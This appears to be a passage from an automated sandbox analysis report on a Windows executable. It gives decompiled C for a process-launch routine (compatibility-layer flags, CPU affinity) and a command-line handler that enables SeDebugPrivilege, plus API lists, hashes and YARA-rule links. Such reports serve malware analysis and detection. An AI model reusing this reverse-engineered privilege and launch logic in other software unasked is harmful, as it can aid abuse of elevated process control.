                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                                                                                                                          0x004022d5
                                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                                          0x004022e7
                                                                                                                                                                                                                          0x004022ec
                                                                                                                                                                                                                          0x004022f7
                                                                                                                                                                                                                          0x004022fa
                                                                                                                                                                                                                          0x004022fd
                                                                                                                                                                                                                          0x00402300
                                                                                                                                                                                                                          0x00402307
                                                                                                                                                                                                                          0x0040230d
                                                                                                                                                                                                                          0x0040230e
                                                                                                                                                                                                                          0x00402318
                                                                                                                                                                                                                          0x00402321
                                                                                                                                                                                                                          0x00402324
                                                                                                                                                                                                                          0x00402327
                                                                                                                                                                                                                          0x0040232a
                                                                                                                                                                                                                          0x0040232d
                                                                                                                                                                                                                          0x00402334
                                                                                                                                                                                                                          0x00402337
                                                                                                                                                                                                                          0x0040233e
                                                                                                                                                                                                                          0x0040234f
                                                                                                                                                                                                                          0x00402356
                                                                                                                                                                                                                          0x0040235b
                                                                                                                                                                                                                          0x0040235e
                                                                                                                                                                                                                          0x0040236d
                                                                                                                                                                                                                          0x00402374
                                                                                                                                                                                                                          0x0040237e
                                                                                                                                                                                                                          0x00402395
                                                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                                                          0x004023ac
                                                                                                                                                                                                                          0x004023cf
                                                                                                                                                                                                                          0x004023d2
                                                                                                                                                                                                                          0x004023d9
                                                                                                                                                                                                                          0x004023de
                                                                                                                                                                                                                          0x004023f6
                                                                                                                                                                                                                          0x00402403
                                                                                                                                                                                                                          0x00402414
                                                                                                                                                                                                                          0x00402419
                                                                                                                                                                                                                          0x00402403
                                                                                                                                                                                                                          0x0040241a
                                                                                                                                                                                                                          0x00402423
                                                                                                                                                                                                                          0x00402458
                                                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                                                          0x00402464
                                                                                                                                                                                                                          0x00402467
                                                                                                                                                                                                                          0x00402468
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402425
                                                                                                                                                                                                                          0x00402428
                                                                                                                                                                                                                          0x0040242b
                                                                                                                                                                                                                          0x00402433
                                                                                                                                                                                                                          0x00402434
                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                          0x0040247c
                                                                                                                                                                                                                          0x00402481
                                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                                          0x00402495
                                                                                                                                                                                                                          0x0040249a
                                                                                                                                                                                                                          0x004024b7
                                                                                                                                                                                                                          0x004024be
                                                                                                                                                                                                                          0x004024cd
                                                                                                                                                                                                                          0x004024d1
                                                                                                                                                                                                                          0x004024ed
                                                                                                                                                                                                                          0x004024f0
                                                                                                                                                                                                                          0x00402506
                                                                                                                                                                                                                          0x0040250b
                                                                                                                                                                                                                          0x00402512
                                                                                                                                                                                                                          0x00402518
                                                                                                                                                                                                                          0x00402519
                                                                                                                                                                                                                          0x0040251e
                                                                                                                                                                                                                          0x00402524
                                                                                                                                                                                                                          0x00402527
                                                                                                                                                                                                                          0x0040252b
                                                                                                                                                                                                                          0x00402530
                                                                                                                                                                                                                          0x00402531
                                                                                                                                                                                                                          0x00402531
                                                                                                                                                                                                                          0x0040253d
                                                                                                                                                                                                                          0x0040255a
                                                                                                                                                                                                                          0x00402561
                                                                                                                                                                                                                          0x00402570
                                                                                                                                                                                                                          0x00402574
                                                                                                                                                                                                                          0x00402590
                                                                                                                                                                                                                          0x00402593
                                                                                                                                                                                                                          0x004025a9
                                                                                                                                                                                                                          0x004025ae
                                                                                                                                                                                                                          0x004025b5
                                                                                                                                                                                                                          0x004025bb
                                                                                                                                                                                                                          0x004025bc
                                                                                                                                                                                                                          0x004025c1
                                                                                                                                                                                                                          0x004025c7
                                                                                                                                                                                                                          0x004025ca
                                                                                                                                                                                                                          0x004025cd
                                                                                                                                                                                                                          0x004025ce
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025d4
                                                                                                                                                                                                                          0x004025da
                                                                                                                                                                                                                          0x004025e3
                                                                                                                                                                                                                          0x004025eb
                                                                                                                                                                                                                          0x00402633
                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                          0x00402608
                                                                                                                                                                                                                          0x0040260f
                                                                                                                                                                                                                          0x00402614
                                                                                                                                                                                                                          0x00402624
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x00402630
                                                                                                                                                                                                                          0x0040263a
                                                                                                                                                                                                                          0x0040263b
                                                                                                                                                                                                                          0x00402646
                                                                                                                                                                                                                          0x0040264b
                                                                                                                                                                                                                          0x0040264c
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265a
                                                                                                                                                                                                                          0x0040265d
                                                                                                                                                                                                                          0x00402666
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402668
                                                                                                                                                                                                                          0x00402672
                                                                                                                                                                                                                          0x00402675
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                                                          0x00402683
                                                                                                                                                                                                                          0x0040268b
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x0040269e
                                                                                                                                                                                                                          0x004026a3
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x004026b5
                                                                                                                                                                                                                          0x004026b8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ba
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026ae
                                                                                                                                                                                                                          0x004026bf
                                                                                                                                                                                                                          0x004026c1
                                                                                                                                                                                                                          0x004026c6
                                                                                                                                                                                                                          0x004026cc
                                                                                                                                                                                                                          0x004026d5
                                                                                                                                                                                                                          0x004026db
                                                                                                                                                                                                                          0x004026e4
                                                                                                                                                                                                                          0x004026ea
                                                                                                                                                                                                                          0x004026f3
                                                                                                                                                                                                                          0x004026f9
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x00402707
                                                                                                                                                                                                                          0x0040270d
                                                                                                                                                                                                                          0x00402710
                                                                                                                                                                                                                          0x0040276d
                                                                                                                                                                                                                          0x00402770
                                                                                                                                                                                                                          0x0040280b
                                                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                                                          0x00402813
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402810
                                                                                                                                                                                                                          0x00402819
                                                                                                                                                                                                                          0x0040281f
                                                                                                                                                                                                                          0x00402836
                                                                                                                                                                                                                          0x00402841
                                                                                                                                                                                                                          0x00402846
                                                                                                                                                                                                                          0x0040284a
                                                                                                                                                                                                                          0x00402851
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402860
                                                                                                                                                                                                                          0x00402865
                                                                                                                                                                                                                          0x00402876
                                                                                                                                                                                                                          0x00402879
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402888
                                                                                                                                                                                                                          0x00402857
                                                                                                                                                                                                                          0x00402891
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x0040289c
                                                                                                                                                                                                                          0x00402779
                                                                                                                                                                                                                          0x00402784
                                                                                                                                                                                                                          0x0040278d
                                                                                                                                                                                                                          0x004027a4
                                                                                                                                                                                                                          0x004027b3
                                                                                                                                                                                                                          0x004027b8
                                                                                                                                                                                                                          0x004027bb
                                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027c6
                                                                                                                                                                                                                          0x004027d1
                                                                                                                                                                                                                          0x004027d6
                                                                                                                                                                                                                          0x004027d9
                                                                                                                                                                                                                          0x004027db
                                                                                                                                                                                                                          0x004027e2
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e4
                                                                                                                                                                                                                          0x004027e7
                                                                                                                                                                                                                          0x004027f4
                                                                                                                                                                                                                          0x004027fc
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402801
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402803
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402806
                                                                                                                                                                                                                          0x00402715
                                                                                                                                                                                                                          0x00402729
                                                                                                                                                                                                                          0x0040272e
                                                                                                                                                                                                                          0x00402731
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402738
                                                                                                                                                                                                                          0x00402743
                                                                                                                                                                                                                          0x00402748
                                                                                                                                                                                                                          0x0040274d
                                                                                                                                                                                                                          0x00402754
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402756
                                                                                                                                                                                                                          0x00402759
                                                                                                                                                                                                                          0x00402763
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402763
                                                                                                                                                                                                                          0x004026fb
                                                                                                                                                                                                                          0x00402700
                                                                                                                                                                                                                          0x00402702
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402702
                                                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                                                          0x004026ce
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004026ce
                                                                                                                                                                                                                          0x004026ac
                                                                                                                                                                                                                          0x00402443
                                                                                                                                                                                                                          0x0040246a
                                                                                                                                                                                                                          0x00402470
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402470

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402300
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040233E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402356
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004023D9
                                                                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024BE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024D1
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402561
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402574
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040260F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                                                                                                                          • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                                                                          • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                                                                          • API String ID: 2452314994-435178042
                                                                                                                                                                                                                          • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                                                                                                                          0x00408533
                                                                                                                                                                                                                          0x00408533
                                                                                                                                                                                                                          0x00408536
                                                                                                                                                                                                                          0x0040853e
                                                                                                                                                                                                                          0x00408546
                                                                                                                                                                                                                          0x0040854d
                                                                                                                                                                                                                          0x00408559
                                                                                                                                                                                                                          0x00408563
                                                                                                                                                                                                                          0x00408569
                                                                                                                                                                                                                          0x00408572
                                                                                                                                                                                                                          0x00408583
                                                                                                                                                                                                                          0x0040858d
                                                                                                                                                                                                                          0x00408595
                                                                                                                                                                                                                          0x0040859e
                                                                                                                                                                                                                          0x004085a2
                                                                                                                                                                                                                          0x004085a6
                                                                                                                                                                                                                          0x004085aa
                                                                                                                                                                                                                          0x004085ae
                                                                                                                                                                                                                          0x004085b8
                                                                                                                                                                                                                          0x004085c1
